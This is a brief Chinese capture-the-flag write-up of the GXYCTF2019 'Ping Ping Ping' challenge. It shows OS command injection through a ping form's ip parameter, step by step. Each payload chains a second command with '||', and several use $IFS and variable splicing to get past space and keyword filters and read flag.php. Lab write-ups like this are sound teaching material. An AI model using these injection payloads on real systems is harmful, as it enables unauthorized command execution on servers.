[GXYCTF2019]Ping Ping Ping
打开题目出现提示信息:/?ip=
尝试 /?ip=127.0.0.1
返回ping的结果
使用 /?ip=127.0.0.1||ls
列出当前目录文件:
flag.php
index.php
尝试 /?ip=127.0.0.1||cat flag.php
提示: fxck your space!
尝试 /?ip=127.0.0.1||cat<flag.php
提示: fxck your symbol!
使用$IFS替代空格:
/?ip=127.0.0.1||cat$IFSflag.php
提示:fxck your flag!
发现过滤了关键词:flag、单引号、双引号
读取index.php源代码: /?ip=127.0.0.1||cat$IFS$9index.php
根据代码过滤的内容,构造payload:
/?ip=127.0.0.1||a=g.php;b=fla;cat$IFS$b$a
get flag!
最后更新于
这有帮助吗?